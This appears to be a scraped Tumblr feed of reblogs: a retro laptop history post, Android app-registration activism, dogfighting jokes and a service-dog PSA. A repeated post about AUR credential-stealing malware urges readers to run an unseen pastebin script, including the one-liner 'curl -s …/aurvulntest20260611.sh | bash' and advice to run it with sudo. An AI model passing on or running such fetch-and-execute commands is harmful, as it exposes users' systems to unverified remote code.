A Fox With Penguins @afoxwithpenguins - Tumblr Blog

My little internet corner, welcome in!

I now have a personal website!

#personal website #nekoweb

yodaprod

dietspam16

foone

Hi, Foone here, I'm a retrocomputer educator! I'm here to explain the real reason this laptop is like this.

So this is the Panasonic PRONOTE PD CF-62, it's a Pentium 133mhz running Windows 95, released in August 1996. Panasonic did this sort of trick more than once, they did a similar thing with an under-keyboard CD-ROM drive in the PD CF-41, from 1995.

This one is so fancy because that's not just a self-loading under-keyboard laptop CD-ROM drive, it's a HYBRID PD/CD-ROM self-loading under-keyboard laptop drive! It has to be this complex because it takes PD discs (which are the size of caddies) and caddyless CD-ROMs!

So what's PD discs?

They're an optical format by Panasonic, the Phase-change Dual (or Phase-change Disc). They're from 1996, store as much as CD, but are rewritable... much like the later CD-RWs which used basically the same technology, just in a slightly different format. Unlike CD-RWs (which you had to burn (usually), they acted like a hard drive, fully rewritable at any point. That's why the disc is hard-sectored, which you can see through the shutter gap. Those vertical lines indicate where sectors start and end.

So yeah, this laptop has a complex drive that can take both types of discs, and the whole thing folds under the keyboard. Fucking wild.

But the root reason, of course, is that they did this because it's a cool design, and they wanted to do that. Why did they think this was cool, why did they want to do this?

Pervert reasons.

Next question!

proxmox-official

AUR has been hit with malware

Per the CachyOS subreddit:

"As the title states, the Arch AUR has been hit by a huge malware infection campaign over the last couple of days. There's an earlier post referring to alvr. That's not the only package it's hundreds of them, many of them Aur packages average people would install like apple-music-desktop.

I don't have the full details of the scope of the malware campaign. I know it's a credential stealer so it steals ssh keys and browser login info and apparently has rootkit potential.

This was widespread and targeted orphaned packages. Aur for some reason allows other people to take over existing projects.

The bottom line is if you used the aur over the last couple of days you may have been infected and the problem with taking over orphaned packages I believe remains. I personally would not use the Aur for the foreseeable future, and ideally not at all. It's a security risk."

There is a script that you can run on your machine to detect if you have a package that is known to have been infected which you can view here. I have also linked the subreddit post here.

Just download it, make it executable and run the script with sudo and let it run, it will tell you what it found once it's complete.

Pls reblog to signal boost!!

proxmox-official

Per the thread again: As I was interested in more in-depth information some can be found here, as well as a preliminary analysis of the malware:

https://www.sonatype.com/blog/atomic-arch-npm-campaign-adds-malicious-dependency

https://ioctl.fail/preliminary-analysis-of-aur-malware/

Users can also run the following to check for malicious packages:

curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh | bash

very-gay-alkyrion

Bash pipe perfec/t place for internet script no problems ever piping script into bash

proxmox-official

AUR has been hit with malware

Per the CachyOS subreddit:

"As the title states, the Arch AUR has been hit by a huge malware infection campaign over the last couple of days. There's an earlier post referring to alvr. That's not the only package it's hundreds of them, many of them Aur packages average people would install like apple-music-desktop.

I don't have the full details of the scope of the malware campaign. I know it's a credential stealer so it steals ssh keys and browser login info and apparently has rootkit potential.

This was widespread and targeted orphaned packages. Aur for some reason allows other people to take over existing projects.

The bottom line is if you used the aur over the last couple of days you may have been infected and the problem with taking over orphaned packages I believe remains. I personally would not use the Aur for the foreseeable future, and ideally not at all. It's a security risk."

There is a script that you can run on your machine to detect if you have a package that is known to have been infected which you can view here. I have also linked the subreddit post here.

Just download it, make it executable and run the script with sudo and let it run, it will tell you what it found once it's complete.

Pls reblog to signal boost!!

proxmox-official

Per the thread again: As I was interested in more in-depth information some can be found here, as well as a preliminary analysis of the malware:

https://www.sonatype.com/blog/atomic-arch-npm-campaign-adds-malicious-dependency

https://ioctl.fail/preliminary-analysis-of-aur-malware/

Users can also run the following to check for malicious packages:

curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh | bash

proxmox-official

AUR has been hit with malware

Per the CachyOS subreddit:

"As the title states, the Arch AUR has been hit by a huge malware infection campaign over the last couple of days. There's an earlier post referring to alvr. That's not the only package it's hundreds of them, many of them Aur packages average people would install like apple-music-desktop.

I don't have the full details of the scope of the malware campaign. I know it's a credential stealer so it steals ssh keys and browser login info and apparently has rootkit potential.

This was widespread and targeted orphaned packages. Aur for some reason allows other people to take over existing projects.

The bottom line is if you used the aur over the last couple of days you may have been infected and the problem with taking over orphaned packages I believe remains. I personally would not use the Aur for the foreseeable future, and ideally not at all. It's a security risk."

There is a script that you can run on your machine to detect if you have a package that is known to have been infected which you can view here. I have also linked the subreddit post here.

Just download it, make it executable and run the script with sudo and let it run, it will tell you what it found once it's complete.

Pls reblog to signal boost!!

proxmox-official

Per the thread again: As I was interested in more in-depth information some can be found here, as well as a preliminary analysis of the malware:

https://www.sonatype.com/blog/atomic-arch-npm-campaign-adds-malicious-dependency

https://ioctl.fail/preliminary-analysis-of-aur-malware/

Users can also run the following to check for malicious packages:

curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh | bash

proxmox-official

AUR has been hit with malware

Per the CachyOS subreddit:

"As the title states, the Arch AUR has been hit by a huge malware infection campaign over the last couple of days. There's an earlier post referring to alvr. That's not the only package it's hundreds of them, many of them Aur packages average people would install like apple-music-desktop.

I don't have the full details of the scope of the malware campaign. I know it's a credential stealer so it steals ssh keys and browser login info and apparently has rootkit potential.

This was widespread and targeted orphaned packages. Aur for some reason allows other people to take over existing projects.

The bottom line is if you used the aur over the last couple of days you may have been infected and the problem with taking over orphaned packages I believe remains. I personally would not use the Aur for the foreseeable future, and ideally not at all. It's a security risk."

There is a script that you can run on your machine to detect if you have a package that is known to have been infected which you can view here. I have also linked the subreddit post here.

Just download it, make it executable and run the script with sudo and let it run, it will tell you what it found once it's complete.

Pls reblog to signal boost!!

proxmox-official

Per the thread again: As I was interested in more in-depth information some can be found here, as well as a preliminary analysis of the malware:

https://www.sonatype.com/blog/atomic-arch-npm-campaign-adds-malicious-dependency

https://ioctl.fail/preliminary-analysis-of-aur-malware/

Users can also run the following to check for malicious packages:

curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh | bash

kaioty-summer

Hey, did y'all see this?

I saw this when running newpipe. But wait, it gets deeper. I clicked on the details buttons and it said as of today, we have 83 days left until Google rolls out this new requirement for apps inside and outside of the google play store. If any developer disagrees with their new terms and fees, they will be blocked!

I'll share some of the info below:

Looks like they're trying to nuke the remaining privacy and freedoms we have left on the internet.

What to do?

-Get your developer friends to not comply to their new guides

- Sign the open letter on the site and take action by checking out the full resources list on their website as well!

To summarize, this is all daunting especially when you feel all alone with unfair and inhumane regulations comming out faster than improvements but we got this working together!

Share the link with your friends, family and anyone who will listen!

Your phone is about to stop being yours. In September 2026, Google will block every Android app whose developer hasn't registered with them.

yellowmagicalgirl

If you're in the US, I created a petition to make it easier to contact senators and congressmen.

Join 1 people. Google is trying to make people hand over government id in order to make an Android app. If they don't, then that app can't b

If you're not in the US, see if your country is listed here for whom to contact.

dragongirlteeth

Air to air combat is the easiest form of warfare to argue that both parties consent to. Dogfighting is basically kink and it should turn you on at least a little.

skc-official

"yeah this is a totally platonic rivalry" you are literally doing this

transgender-dumpster-princess

This honestly does it all such little justice. You need to know your opponents airframe intimately- how it handles, turns, how much it weights and how it pulls against the air. How to dance with her body elegantly, and all for just a brief moment under the sights. The strain of your body as you pull the stick, the strain of the engines as they try to give all the force you need. All for a glimpse. The blood rushing from your head as you push forward, the fight for elevation, dominance, potential energy. Position is gained slowly and lost quickly. Eagerness can find you vulnerable, under the eye of your enemy. And all they need too, just a brief glimpse. Just one moment under her sights till you’re undone, penetrated, bleeding oil and smoke and shuddering.

daylights-rain

Aircraft Mechanic (angry): Hey! You're trying to fuck my wife!

eggsaladstain

god bless the producers of worst cooks

doktoptaxa

this game is driving me insane

lumpatronics

SERVICE DOG PSA

So today I tripped. Fell flat on my face, it was awful but ultimately harmless. My service dog, however, is trained to go get an adult if I have a seizure, and he assumed this was a seizure (were training him to do more to care for me, but we didn’t learn I had epilepsy until a year after we got him)

I went after him after I had dusten off my jeans and my ego, and I found him trying to get the attention of a very annoyed woman. She was swatting him away and telling him to go away. So I feel like I need to make this heads up

If a service dog without a person approaches you, it means the person is down and in need of help

Don’t get scared, don’t get annoyed, follow the dog! If it had been an emergency situation, I could have vomited and choked, I could have hit my head, I could have had so many things happen to me. We’re going to update his training so if the first person doesn’t cooperate, he moves on, but seriously guys. If what’s-his-face could understand that lassie wanted him to go to the well, you can figure out that a dog in a vest proclaiming it a service dog wants you to follow him

thetenderpassion

hotcrossedfangs

shounenchild

my favorite part of this whole thing tbh

cetitanhasmoved

seabassapologist

babushkaat

hunter-rodrigez

kitty perfect weight for picking up for cuddles! kitty very Soft and warm and will purr comfortably in your arms. Pick up kitty. no problems ever when picking up kitty because good weight and size for picking up after surgery.